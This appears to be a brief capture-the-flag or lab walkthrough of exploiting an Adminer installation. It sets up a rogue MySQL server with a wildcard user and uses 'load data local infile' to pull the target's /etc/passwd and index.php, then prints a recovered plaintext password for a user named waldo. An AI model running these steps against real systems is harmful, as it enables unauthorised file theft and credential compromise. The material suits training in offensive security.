4 adminer-php
Enumerate adminer.php
adminer.php

Using https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
Update
bind-address=0.0.0.0
in/etc/mysql/mariadb.conf.d/50-server.cnf
Need to setup mysql on kali.
sudo service mysql start
Reset root password for mysql using https://www.techrepublic.com/article/how-to-set-change-and-recover-a-mysql-root-password/
Create User on mysql
CREATE USER 'kashz'@'%' IDENTIFIED BY 'kashz';
GRANT ALL ON *.* TO 'kashz'@'%' IDENTIFIED BY 'kashz';
FLUSH PRIVILEGES;


Create database
pwn
Create table
data
with fieldout
asvarchar(256)
Trying to read /etc/passwd
/etc/passwd
load data local infile "/etc/passwd"
into table pwn.data
fields terminated by "\n";

Trying to read /var/www/html/index.php
/var/www/html/index.php
load data local infile "/var/www/html/index.php"
into table pwn.data
fields terminated by "\n";

We see different password

Using waldo:&<h5b~yK3F#{PaPB&dA}{H>

Last updated